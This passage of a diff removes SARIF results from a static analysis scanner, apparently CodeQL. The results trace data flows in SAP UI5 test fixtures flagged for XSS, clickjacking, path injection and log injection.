"user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 38 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "1406455ac263a2d9:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 12, - "startColumn" : 26, - "endColumn" : 46 - } - }, - "message" : { - "text" : "new JSONModel(oData)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 38 - } - }, - "message" : { - "text" : "content={/output}" - } - } - } ] - } ] - }, { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" 
: { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 15, - "startColumn" : 25, - "endColumn" : 53 - } - }, - "message" : { - "text" : "oModel. ... 
input')" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 15, - "startColumn" : 17, - "endColumn" : 53 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 16, - "startColumn" : 43, - "endColumn" : 48 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 29 - } - }, - "message" : { - "text" : "output: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 38 - } - }, - "message" : { - "text" : "content={/output}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - 
"toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 37 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "97b29ed20ac04ff0:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 343 - }, - "region" : { - "startLine" : 8, - "startColumn" : 40, - "endColumn" : 63 - } - }, - "message" : { - "text" : "\"contro ... 
l.json\"" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 37 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 355 - }, - "region" : { - "startLine" : 8, - "startColumn" : 11, - "endColumn" : 34 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "5edd24be658b61a4:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 355 - }, - "region" : { - "startLine" : 5, - "startColumn" : 11, - "endColumn" : 32 - } - }, - "message" : { - "text" : "data-value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 352 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 355 - }, - "region" : { - "startLine" : 8, - "startColumn" : 11, - "endColumn" : 34 - } - }, - "message" : { - "text" : "data-content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 355 - }, - "region" : { - "startLine" : 5, - "startColumn" : 11, - "endColumn" : 32 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - 
}, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1).\nXSS vulnerability due to [user-provided value](2)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - }, - "region" : { - "startLine" : 22, - "startColumn" : 5, - "endColumn" : 38 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "6e0d8f690e30e24a:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endLine" : 10, - "endColumn" : 27 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 407 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - }, - "region" : { - "startLine" : 22, - "startColumn" : 5, - "endColumn" : 38 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - }, { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : 
{ - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - }, - "region" : { - "startLine" : 15, - "startColumn" : 5, - "endLine" : 18, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 407 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - }, - "region" : { - "startLine" : 22, - "startColumn" : 5, - "endColumn" : 38 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endLine" : 10, - "endColumn" : 27 - } - }, - "message" : { - "text" : "user-provided value" - } - }, { - "id" : 2, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - }, - "region" : { - "startLine" : 15, - "startColumn" : 5, - "endLine" : 18, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-clickjacking", - "rule" : { - "id" : "js/ui5-clickjacking", - "index" : 1, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - 
"text" : "Possible clickjacking vulnerability due to window\\[ ... onfig\"\\] being set to `allow`." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 136 - }, - "region" : { - "startLine" : 9, - "startColumn" : 9, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "6152b8f74a1abdf5:1", - "primaryLocationStartColumnFingerprint" : "0" - } - }, { - "ruleId" : "js/ui5-clickjacking", - "rule" : { - "id" : "js/ui5-clickjacking", - "index" : 1, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Possible clickjacking vulnerability due to data-sap-ui-frameOptions=allow being set to `allow`." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 136 - }, - "region" : { - "startLine" : 28, - "startColumn" : 34, - "endColumn" : 66 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "b01bd23ca3666824:1", - "primaryLocationStartColumnFingerprint" : "25" - } - }, { - "ruleId" : "js/ui5-clickjacking", - "rule" : { - "id" : "js/ui5-clickjacking", - "index" : 1, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Possible clickjacking vulnerability due to missing frame options." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 138 - }, - "region" : { - "startLine" : 2, - "endColumn" : 16 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "7fe81114896a63c:1", - "primaryLocationStartColumnFingerprint" : "0" - } - }, { - "ruleId" : "js/ui5-clickjacking", - "rule" : { - "id" : "js/ui5-clickjacking", - "index" : 1, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Possible clickjacking vulnerability due to missing frame options." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 244 - }, - "region" : { - "startLine" : 2, - "endColumn" : 16 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "df700c15dad274b2:1", - "primaryLocationStartColumnFingerprint" : "0" - } - }, { - "ruleId" : "js/ui5-path-injection", - "rule" : { - "id" : "js/ui5-path-injection", - "index" : 2, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The path of a saved file depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 216 - }, - "region" : { - "startLine" : 17, - "startColumn" : 43, - "endColumn" : 61 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "68e5ff83e2198ff5:1", - "primaryLocationStartColumnFingerprint" : "26" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 220 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 214 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 216 - }, - "region" : { - "startLine" : 8, - "startColumn" : 23, - "endColumn" : 38 - } - }, - "message" : { - "text" : "{ type: \"int\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 216 - }, - 
"region" : { - "startLine" : 17, - "startColumn" : 43, - "endColumn" : 61 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 220 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-path-injection", - "rule" : { - "id" : "js/ui5-path-injection", - "index" : 2, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The path of a saved file depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - }, - "region" : { - "startLine" : 23, - "startColumn" : 43, - "endColumn" : 55 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "b79de9dff4d8f842:1", - "primaryLocationStartColumnFingerprint" : "26" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 227 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - 
"index" : 228 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - }, - "region" : { - "startLine" : 9, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - }, - "region" : { - "startLine" : 15, - "startColumn" : 29, - "endColumn" : 47 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - }, - "region" : { - "startLine" : 15, - "startColumn" : 21, - "endColumn" : 47 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - }, - "region" : { - "startLine" : 17, - "startColumn" : 53, - "endColumn" : 58 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - }, - "region" : { - "startLine" : 17, - "startColumn" : 46, - "endColumn" : 59 - } - 
}, - "message" : { - "text" : "String(value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - }, - "region" : { - "startLine" : 17, - "startColumn" : 36, - "endColumn" : 60 - } - }, - "message" : { - "text" : "encodeX ... value))" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - }, - "region" : { - "startLine" : 17, - "startColumn" : 21, - "endColumn" : 60 - } - }, - "message" : { - "text" : "xssSanitized" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - }, - "region" : { - "startLine" : 23, - "startColumn" : 43, - "endColumn" : 55 - } - }, - "message" : { - "text" : "xssSanitized" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 227 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-path-injection", - "rule" : { - "id" : "js/ui5-path-injection", - "index" : 2, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The path of a saved file depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - }, - "region" : { - "startLine" : 16, - "startColumn" : 39, - "endColumn" : 67 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "de27f6d546a116e8:1", - "primaryLocationStartColumnFingerprint" : "26" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 235 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - }, - "region" : { - "startLine" : 16, - "startColumn" : 39, - "endColumn" : 67 - } - }, - "message" : { - "text" : "oModel. ... 
input')" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 235 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 8, - "startColumn" : 26, - "endColumn" : 31 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "62d5a4db56a18502:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... 
param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 8, - "startColumn" : 26, - "endColumn" : 31 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 16, - "startColumn" : 26, - "endColumn" : 31 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "751ece7cb6fd18f7:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "req.url" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 13, - "endColumn" : 37 - } - }, - "message" : { - "text" : "url.par ... 
